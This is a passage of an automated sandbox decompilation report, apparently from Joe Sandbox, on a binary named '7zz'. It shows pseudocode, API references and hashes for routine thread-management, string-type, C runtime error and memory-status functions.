														__eflags = _t400 - _t389;
														if(_t400 != _t389) {
															goto L95;
														}
													} else {
														__eflags =  *(_t411 - 0x24) - _t389;
														if( *(_t411 - 0x24) <= _t389) {
															goto L76;
														}
														_t326 =  *(_t411 - 0x10) *  *(_t411 - 0x24);
														__eflags = _t326;
														while(1) {
															__eflags =  *(_t411 - 0x10);
															if( *(_t411 - 0x10) == 0) {
																__eflags = _t389;
																if(_t389 == 0) {
																	_push(1);
																	_pop(0);
																}
															}
															_t280 = (_t389 << 4) + _t404 + 0x24;
															 *(_t280 + 8) = (_t326 + _t389) * 0x00000150 & 0x000007ff;
															 *((char*)(_t280 + 0xc)) = 0;
															 *(_t280 + 4) = _t389;
															 *_t280 = _t404;
															_t281 = E00467AD0(_t404 + _t389 * 4, E004148ED, _t280);
															__eflags = _t281;
															 *(_t411 - 0x2c) = _t281;
															if(_t281 != 0) {
																break;
															}
															_t389 = _t389 + 1;
															__eflags = _t389 -  *(_t411 - 0x24);
															if(_t389 <  *(_t411 - 0x24)) {
																continue;
															}
															goto L76;
														}
														DeleteCriticalSection(_t411 - 0x50);
														_t352 =  *(_t411 - 0x18);
														 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
														__eflags =  *(_t411 - 0x18);
														if( *(_t411 - 0x18) != 0) {
															E0041415B(_t352, _t389, _t411, 3);
														}
														_t242 =  *(_t411 - 0x2c);
														goto L113;
													}
													L76:
													 *(_t411 - 0x10) =  *(_t411 - 0x10) + 1;
													__eflags =  *(_t411 - 0x10) -  *(_t411 - 0x1c);
												} while ( *(_t411 - 0x10) <  *(_t411 - 0x1c));
												_t323 =  *(_t411 - 0x20);
												_t249 =  *(_t411 - 0x14);
												_t389 =  *(_t411 - 0x1c);
												_t399 = 0;
												__eflags = 0;
												goto L78;
											}
											DeleteCriticalSection(_t411 - 0x50);
											_t357 =  *(_t411 - 0x18);
											 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
											__eflags =  *(_t411 - 0x18) - _t399;
											if( *(_t411 - 0x18) != _t399) {
												E0041415B(_t357, _t389, _t411, 3);
											}
											_t242 =  *(_t411 - 0x2c);
											goto L113;
										}
										_t289 = _t323 + 0x68;
										 *(_t411 - 0x14) = _t389;
										do {
											 *((intOrPtr*)(_t411 - 0x68)) =  *((intOrPtr*)(_t411 - 0x68)) +  *((intOrPtr*)(_t289 - 4));
											asm("adc [ebp-0x64], esi");
											 *((intOrPtr*)(_t411 - 0x60)) =  *((intOrPtr*)(_t411 - 0x60)) +  *_t289;
											asm("adc [ebp-0x5c], esi");
											_t289 = _t289 + 0x84;
											_t118 = _t411 - 0x14;
											 *_t118 =  *(_t411 - 0x14) - 1;
											__eflags =  *_t118;
										} while ( *_t118 != 0);
										goto L59;
									}
									_t392 =  *(_t411 - 0x38);
									_push(_t411 - 0x50);
									goto L106;
								} else {
									_t405 = _t323;
									 *(_t411 - 0x14) = _t389;
									do {
										E00467AC0( *_t405);
										_t405 = _t405 + 0x84;
										_t98 = _t411 - 0x14;
										 *_t98 =  *(_t411 - 0x14) - 1;
									} while ( *_t98 != 0);
									goto L54;
								}
							} else {
								goto L37;
							}
							do {
								L37:
								 *(_t411 - 0x14) = 2;
								_t408 =  *(_t411 - 0x10) * 0x84 +  *(_t411 - 0x20);
								_t393 = _t408 + 0xc;
								_t327 = _t393;
								do {
									_push(0x50);
									_t292 = E004079F2();
									if(_t292 == 0) {
										_t292 = 0;
										__eflags = 0;
									} else {
										 *((intOrPtr*)(_t292 + 4)) = 0;
										 *((intOrPtr*)(_t292 + 0x40)) = 0;
										 *((intOrPtr*)(_t292 + 0x4c)) = 0;
										 *_t292 = 0x47aaf4;
									}
									 *_t327 = _t292;
									E0040C9B4(_t327 + 8, _t292);
									_t294 =  *_t327;
									_t327 = _t327 + 4;
									_t81 = _t411 - 0x14;
									 *_t81 =  *(_t411 - 0x14) - 1;
									 *((intOrPtr*)(_t294 + 8)) = _t411 - 0x50;
								} while ( *_t81 != 0);
								if( *(_t411 - 0x10) == 0) {
									 *( *_t393 + 0x4c) =  *(_t411 + 8);
									 *( *_t393 + 0x40) =  *(_t411 - 0x1c);
									E00414885( *_t393 + 0x10, _t378);
								}
								_t389 =  *(_t411 - 0x1c);
								if(_t389 <= 1) {
									_t295 = E00413E35(_t408);
								} else {
									_t378 = E004148B5;
									 *(_t408 + 0x20) =  *(_t411 - 0x10) * 0x00000150 & 0x000007ff;
									_t295 = E00467AD0(_t408, E004148B5, _t408);
								}
								_t400 = _t295;
								if(_t400 != 0) {
									goto L95;
								}
								 *(_t411 - 0x10) =  *(_t411 - 0x10) + 1;
							} while ( *(_t411 - 0x10) < _t389);
							_t323 =  *(_t411 - 0x20);
							_t389 =  *(_t411 - 0x1c);
							goto L50;
						}
						_t409 = _t323;
						while(1) {
							_push(_t411 - 0x94);
							_push( *((intOrPtr*)(_t411 - 0x8c)));
							_push( *(_t411 - 0x2c));
							_t303 = E00413A0D(_t409, _t430);
							 *(_t411 - 0x30) = _t303;
							if(_t303 != 0) {
								break;
							}
							 *(_t411 - 0x10) =  *(_t411 - 0x10) + 1;
							_t409 = _t409 + 0x84;
							if( *(_t411 - 0x10) < _t389) {
								continue;
							}
							goto L36;
						}
						_t372 =  *(_t411 - 0x18);
						 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
						__eflags =  *(_t411 - 0x18);
						if( *(_t411 - 0x18) != 0) {
							E0041415B(_t372, _t389, _t411, 3);
						}
						_t242 =  *(_t411 - 0x30);
						goto L113;
					}
					_t410 = _t398 + 8;
					_t422 = _t410;
					while(1) {
						_push(0);
						asm("sbb eax, eax");
						_t378 = 1;
						_push(0x30101);
						 *(_t410 + 0x54) =  !( ~( *(_t411 - 0x10))) &  *(_t411 + 8);
						_t309 = E0040C964(_t410, 1, _t422);
						 *(_t411 - 0x14) = _t309;
						if(_t309 != 0) {
							break;
						}
						if( *_t410 == _t309) {
							_t375 =  *(_t411 - 0x18);
							 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
							__eflags =  *(_t411 - 0x18) - _t309;
							L30:
							if(__eflags != 0) {
								E0041415B(_t375, 0x30101, _t411, 3);
							}
							_t242 = 0x80004001;
							goto L113;
						}
						_t425 =  *(_t411 - 0x24) - _t309;
						 *(_t411 - 0x14) = _t309;
						if( *(_t411 - 0x24) <= _t309) {
							L15:
							 *(_t411 - 0x10) =  *(_t411 - 0x10) + 1;
							_t410 = _t410 + 0x84;
							if( *(_t411 - 0x10) <  *(_t411 - 0x1c)) {
								continue;
							}
							_t389 =  *(_t411 - 0x1c);
							goto L17;
						}
						 *(_t411 - 0x28) = _t410 + 0x3c;
						while(1) {
							_push(0);
							_t378 = 0;
							_push(0x30101);
							_t314 = E0040C964( *(_t411 - 0x28), 0, _t425);
							 *(_t411 - 0x30) = _t314;
							if(_t314 != 0) {
								break;
							}
							if( *( *(_t411 - 0x28)) == 0) {
								_t375 =  *(_t411 - 0x18);
								 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
								__eflags =  *(_t411 - 0x18);
								goto L30;
							}
							 *(_t411 - 0x14) =  *(_t411 - 0x14) + 1;
							 *(_t411 - 0x28) =  *(_t411 - 0x28) + 4;
							if( *(_t411 - 0x14) <  *(_t411 - 0x24)) {
								continue;
							}
							goto L15;
						}
						_t377 =  *(_t411 - 0x18);
						 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
						__eflags =  *(_t411 - 0x18);
						if( *(_t411 - 0x18) != 0) {
							E0041415B(_t377, 0x30101, _t411, 3);
						}
						_t242 =  *(_t411 - 0x30);
						goto L113;
					}
					_t374 =  *(_t411 - 0x18);
					 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
					__eflags =  *(_t411 - 0x18);
					if( *(_t411 - 0x18) != 0) {
						E0041415B(_t374, 0x30101, _t411, 3);
					}
					_t242 =  *(_t411 - 0x14);
				}
			}

0x00414269
0x00414269
0x0041426e
0x0041427e
0x0041427f
0x00414284
0x0041428a
0x00414292
0x0041428c
0x0041428e
0x0041428e
0x004142a2
0x004142a5
0x004142a8
0x00414857
0x004142c2
0x004142c2
0x004142c6
0x004142cb
0x004142ce
0x004142d2
0x004142d6
0x004142da
0x004142dd
0x0041436e
0x0041436e
0x00414372
0x0041437c
0x0041437e
0x00414388
0x00414433
0x00414436
0x0041443b
0x0041443f
0x00414445
0x00414449
0x0041444d
0x00414512
0x00414515
0x00414532
0x00414532
0x00414537
0x00414545
0x00414554
0x00414559
0x0041455b
0x0041455e
0x00414561
0x00414564
0x00414567
0x0041456e
0x00414591
0x0041459f
0x004145a1
0x004145a3
0x004145a6
0x004145cf
0x004145d3
0x004145d6
0x004145d8
0x004145db
0x004145de
0x004145e1
0x004146b6
0x004146b6
0x004146b9
0x004146bc
0x0041475a
0x0041475a
0x0041475d
0x0041475f
0x00414790
0x00414795
0x00414797
0x0041479a
0x0041479d
0x004147a0
0x004147aa
0x004147ac
0x004147af
0x004147cd
0x004147cd
0x004147df
0x004147e1
0x004147e3
0x00414815
0x0041481a
0x0041481c
0x0041481d
0x0041483b
0x00414841
0x00414844
0x00414848
0x0041484a
0x0041484e
0x0041484e
0x00414853
0x0041485c
0x00414862
0x0041486a
0x0041486a
0x0041481f
0x0041481f
0x00414825
0x00414828
0x0041482e
0x00414832
0x00414832
0x00414837
0x00000000
0x00414837
0x004147e9
0x004147ef
0x004147f2
0x004147f6
0x004147f8
0x004147fc
0x004147fc
0x00414801
0x00000000
0x00414801
0x004147b1
0x004147b4
0x004147b7
0x004147ba
0x004147bf
0x004147c2
0x004147c5
0x004147ca
0x004147ca
0x004147ca
0x00000000
0x004147b4
0x00414761
0x00414765
0x0041476b
0x0041476e
0x00414772
0x00414774
0x00414778
0x00414778
0x0041477d
0x00000000
0x0041477d
0x004146c2
0x004146c4
0x00000000
0x00000000
0x004146ca
0x004146cd
0x004146d0
0x004146d0
0x004146d4
0x00000000
0x00000000
0x004146db
0x004146dc
0x004146df
0x004146e6
0x004146ee
0x004146f1
0x004146f3
0x004146f5
0x004146f5
0x004146f8
0x004146fb
0x004146fb
0x004146fb
0x004146fb
0x00414700
0x00414700
0x00414707
0x00414707
0x00414707
0x00414707
0x0041470c
0x00414710
0x00000000
0x00000000
0x00414716
0x0041471c
0x0041471f
0x00414723
0x00414725
0x00414729
0x00414729
0x0041472e
0x00000000
0x00000000
0x00000000
0x00000000
0x004145e7
0x004145e7
0x004145f5
0x004145fa
0x004145fc
0x00414601
0x00414604
0x00414607
0x0041460f
0x00414618
0x0041461e
0x00414621
0x00414621
0x00414626
0x0041462a
0x0041468a
0x00414692
0x00414694
0x00414696
0x00000000
0x00000000
0x0041462c
0x0041462c
0x0041462f
0x00000000
0x00000000
0x00414634
0x00414634
0x00414638
0x0041463a
0x0041463d
0x0041463f
0x00414641
0x00414643
0x00414645
0x00414645
0x00414641
0x0041465a
0x0041465f
0x00414662
0x0041466d
0x00414670
0x00414672
0x00414677
0x00414679
0x0041467c
0x00000000
0x00000000
0x00414682
0x00414683
0x00414686
0x00000000
0x00000000
0x00000000
0x00414688
0x0041473a
0x00414740
0x00414743
0x00414747
0x00414749
0x0041474d
0x0041474d
0x00414752
0x00000000
0x00414752
0x0041469c
0x0041469c
0x004146a2
0x004146a2
0x004146ab
0x004146ae
0x004146b1
0x004146b4
0x004146b4
0x00000000
0x004146b4
0x004145ac
0x004145b2
0x004145b5
0x004145b9
0x004145bb
0x004145bf
0x004145bf
0x004145c4
0x00000000
0x004145c4
0x00414570
0x00414573
0x00414576
0x00414579
0x0041457c
0x00414581
0x00414584
0x00414587
0x0041458c
0x0041458c
0x0041458c
0x0041458c
0x00000000
0x00414576
0x00414539
0x0041453f
0x00000000
0x0041451b
0x0041451b
0x0041451d
0x00414520
0x00414522
0x00414527
0x0041452d
0x0041452d
0x0041452d
0x00000000
0x00414520
0x00000000
0x00000000
0x00000000
0x00414453
0x00414453
0x00414456
0x00414463
0x00414466
0x00414469
0x0041446b
0x0041446b
0x0041446d
0x00414475
0x0041448a
0x0041448a
0x00414477
0x00414479
0x0041447c
0x0041447f
0x00414482
0x00414482
0x00414490
0x00414492
0x00414497
0x0041449c
0x0041449f
0x0041449f
0x004144a2
0x004144a2
0x004144ab
0x004144b2
0x004144ba
0x004144c2
0x004144c2
0x004144c7
0x004144cd
0x004144f1
0x004144cf
0x004144de
0x004144e5
0x004144e8
0x004144e8
0x004144f6
0x004144fa
0x00000000
0x00000000
0x00414500
0x00414503
0x0041450c
0x0041450f
0x00000000
0x0041450f
0x0041438e
0x00414390
0x00414398
0x00414399
0x0041439f
0x004143a2
0x004143a9
0x004143ac
0x00000000
0x00000000
0x004143ae
0x004143b1
0x004143ba
0x00000000
0x00000000
0x00000000
0x004143bc
0x00414419
0x0041441c
0x00414420
0x00414422
0x00414426
0x00414426
0x0041442b
0x00000000
0x0041442b
0x004142e3
0x004142e3
0x004142eb
0x004142ee
0x004142f2
0x004142f4
0x004142fd
0x004142fe
0x00414301
0x00414308
0x0041430b
0x00000000
0x00000000
0x00414313
0x004143d8
0x004143db
0x004143df
0x00414406
0x00414406
0x0041440a
0x0041440a
0x0041440f
0x00000000
0x0041440f
0x00414319
0x0041431c
0x0041431f
0x0041435a
0x0041435a
0x0041435d
0x00414369
0x00000000
0x00000000
0x0041436b
0x00000000
0x0041436b
0x00414324
0x00414327
0x0041432a
0x0041432c
0x0041432e
0x0041432f
0x00414336
0x00414339
0x00000000
0x00000000
0x00414345
0x004143fd
0x00414400
0x00414404
0x00000000
0x00414404
0x0041434b
0x0041434e
0x00414358
0x00000000
0x00000000
0x00000000
0x00414358
0x004143e3
0x004143e6
0x004143ea
0x004143ec
0x004143f0
0x004143f0
0x004143f5
0x00000000
0x004143f5
0x004143be
0x004143c1
0x004143c5
0x004143c7
0x004143cb
0x004143cb
0x004143d0
0x004143d0

APIs

__EH_prolog.LIBCMT ref: 0041426E
DeleteCriticalSection.KERNEL32(?), ref: 0041481F

Part of subcall function 00413E35: __EH_prolog.LIBCMT ref: 00413E3A

DeleteCriticalSection.KERNEL32(?), ref: 004145AC

Part of subcall function 00413EF3: __EH_prolog.LIBCMT ref: 00413EF8

DeleteCriticalSection.KERNEL32(?), ref: 00414716
DeleteCriticalSection.KERNEL32(?,?,?), ref: 0041473A
DeleteCriticalSection.KERNEL32(?), ref: 00414765
DeleteCriticalSection.KERNEL32(?), ref: 004147E9
DeleteCriticalSection.KERNEL32(?), ref: 0041483B

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: CriticalDeleteSection$H_prolog
String ID:
API String ID: 267298877-0
Opcode ID: 13d5c9578ffa9f24051f66a8e432b211ca4e975802d1602c744c2f562538c110
Instruction ID: c24d3815df71a14f5bbf7c8d066a825158e8e708a592f674f2395a742420ece0
Opcode Fuzzy Hash: 13d5c9578ffa9f24051f66a8e432b211ca4e975802d1602c744c2f562538c110
Instruction Fuzzy Hash: 8C125A31E002199FDF14DF94C981AEEB7B5BF88314F14416AE529AB380D7789A81CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00472375 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00472375(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, char _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x47cd40);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x4938a4; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x493880; // 0x0
								_a20 = _t44;
							}
							_t13 =  &_a28; // 0x496224
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~( *_t13) & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E0046CC80(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E0046CCB0(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x493870; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x47cd24, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x47cd20, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x4938a4 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}

0x00472378
0x0047237a
0x0047237f
0x0047238a
0x0047238b
0x00472392
0x00472398
0x0047239b
0x004723a4
0x004723e4
0x004723e7
0x00472410
0x00000000
0x00472416
0x00472419
0x0047241b
0x00472420
0x00472420
0x0047242b
0x00472430
0x0047243a
0x00472440
0x00472445
0x00000000
0x00472447
0x00472447
0x00472454
0x00472459
0x0047245c
0x0047245e
0x00472464
0x00472479
0x0047247f
0x00000000
0x00472481
0x00472490
0x00472498
0x00000000
0x0047249a
0x004724a2
0x004724a2
0x00472498
0x0047247f
0x00472445
0x004723e9
0x004723e9
0x004723ee
0x004723f0
0x004723f0
0x00472402
0x00472402
0x004723a6
0x004723a9
0x004723ac
0x004723bc
0x004723d6
0x004724aa
0x004724aa
0x004723dc
0x004723de
0x00000000
0x004723de
0x004723be
0x004723be
0x004723df
0x004723df
0x00000000
0x004723df
0x004723bc
0x004724b2
0x004724bd

APIs

GetStringTypeW.KERNEL32(00000001,0047CD24,00000001,?,747170F0,00496224,?,?,00471FC7,?,?,?,00000000,00000001), ref: 004723B4
GetStringTypeA.KERNEL32(00000000,00000001,0047CD20,00000001,?,?,00471FC7,?,?,?,00000000,00000001), ref: 004723CE
GetStringTypeA.KERNEL32(?,?,?,?,00471FC7,747170F0,00496224,?,?,00471FC7,?,?,?,00000000,00000001), ref: 00472402
MultiByteToWideChar.KERNEL32(?,$bI,?,?,00000000,00000000,747170F0,00496224,?,?,00471FC7,?,?,?,00000000,00000001), ref: 0047243A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00471FC7,?), ref: 00472490
GetStringTypeW.KERNEL32(?,?,00000000,00471FC7,?,?,?,?,?,?,00471FC7,?), ref: 004724A2

Strings

$bI, xrefs: 0047242B, 00472436

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID: $bI
API String ID: 3852931651-2563688255
Opcode ID: 5faa2e72cf23a552d0f70167b23892f61f4cda34b29eb4cb4140b725662a4e30
Instruction ID: a5c6d82e9c342f5f8861e27a946ad25536d4888bca3c47b44a025a795350f61f
Opcode Fuzzy Hash: 5faa2e72cf23a552d0f70167b23892f61f4cda34b29eb4cb4140b725662a4e30
Instruction Fuzzy Hash: 57419E72600259BFCF209FA4DD85EEF3FB8FB09350F10882AF919D2250D37999508B99

Uniqueness

Uniqueness Score: -1.00%

Function 00470C41 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00470C41(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x490378;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x490408) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x490378; // 0x5c000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x493678; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x48e044 == 1) {
						_t16 = _t54 + 0x49037c; // 0x47cc5c
						_t56 = _t16;
						_t19 = E0046B400( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00471740( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E0046B400( &_v424) + 1 > 0x3c) {
								_t49 = E0046B400( &_v424) +  &_v424 - 0x3b;
								E00471CB0(E0046B400( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00471740( &_v164, "Runtime Error!\n\nProgram: ");
							E00471750( &_v164, _t49);
							E00471750( &_v164, "\n\n");
							_t12 = _t54 + 0x49037c; // 0x47cc5c
							E00471750( &_v164,  *_t12);
							_t17 = E00471C24( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}

0x00470c41
0x00470c4a
0x00470c4d
0x00470c4f
0x00470c54
0x00470c58
0x00470c5b
0x00470c61
0x00000000
0x00000000
0x00000000
0x00470c61
0x00470c66
0x00470c69
0x00470c6f
0x00470c75
0x00470c7d
0x00470d6e
0x00470d6e
0x00470d79
0x00470d8b
0x00470c94
0x00470c9a
0x00470cb6
0x00470cc4
0x00470cca
0x00470cd1
0x00470cd3
0x00470ce3
0x00470cfe
0x00470d06
0x00470d0b
0x00470d0b
0x00470d1a
0x00470d27
0x00470d38
0x00470d3d
0x00470d4a
0x00470d60
0x00470d68
0x00470c9a
0x00470c7d
0x00470d93

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00470CAE
GetStdHandle.KERNEL32(000000F4,0047CC5C,00000000,00000000,00000000,?), ref: 00470D84
WriteFile.KERNEL32(00000000), ref: 00470D8B

Strings

..., xrefs: 00470D00
Microsoft Visual C++ Runtime Library, xrefs: 00470D5A
<program name unknown>, xrefs: 00470CBE
Runtime Error!Program: , xrefs: 00470D14

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: 3f1414031e306f802f3caa4c7c29117252c4b502bfb9922d2e50e8356c28ed3a
Instruction ID: 26f8d94228b957b8f636da331ac734a73308fccb95c236921b77b6dd9be393b7
Opcode Fuzzy Hash: 3f1414031e306f802f3caa4c7c29117252c4b502bfb9922d2e50e8356c28ed3a
Instruction Fuzzy Hash: F1313932601208AFEF35EBA4CD85FDE336CEB45304F10856BF54CE6251E678A9848B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C609 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040C609() {
				struct _MEMORYSTATUS _v36;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v100;
				_Unknown_base(*)()* _t15;
				intOrPtr _t17;
				intOrPtr _t19;
				void* _t27;

				_v100 = 0x40;
				_t15 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GlobalMemoryStatusEx");
				if(_t15 == 0) {
					L7:
					_v36.dwLength = 0x20;
					GlobalMemoryStatus( &_v36);
					_t17 = _v36.dwTotalVirtual;
					if(_t17 >= _v36.dwTotalPhys) {
						_t17 = _v36.dwTotalPhys;
					}
					return _t17;
				} else {
					_push( &_v100);
					if( *_t15() == 0) {
						goto L7;
					} else {
						_t19 = _v92;
						_t27 = _v56 - _v88;
						if(_t27 > 0 || _t27 >= 0 && _v60 >= _t19) {
							return _t19;
						} else {
							return _v60;
						}
					}
				}
			}

0x0040c619
0x0040c627
0x0040c62f
0x0040c657
0x0040c65a
0x0040c662
0x0040c668
0x0040c66e
0x0040c670
0x0040c670
0x0040c676
0x0040c631
0x0040c634
0x0040c639
0x00000000
0x0040c63b
0x0040c63e
0x0040c641
0x0040c644
0x0040c656
0x0040c64d
0x0040c651
0x0040c651
0x0040c644
0x0040c639

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040C620
GetProcAddress.KERNEL32(00000000), ref: 0040C627
GlobalMemoryStatus.KERNEL32 ref: 0040C662

Strings

, xrefs: 0040C65A
GlobalMemoryStatusEx, xrefs: 0040C60F
@, xrefs: 0040C619
kernel32.dll, xrefs: 0040C614

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: AddressGlobalHandleMemoryModuleProcStatus
String ID: $@$GlobalMemoryStatusEx$kernel32.dll
API String ID: 2450578220-802862622
Opcode ID: e084be034f3929a9efab15a420d4320ad8e287069fa46d9bd79244de0d77a124
Instruction ID: f023bf0e3df83ca1e7ee498ce2c1c416e3a88b1c0401ce8498900abd94d01139
Opcode Fuzzy Hash: e084be034f3929a9efab15a420d4320ad8e287069fa46d9bd79244de0d77a124
Instruction Fuzzy Hash: 7D014B70A0020DDBDF10EBE4D989A9EB7B5FB94348F244A25E405B7294D779E840CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00470AD6 Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

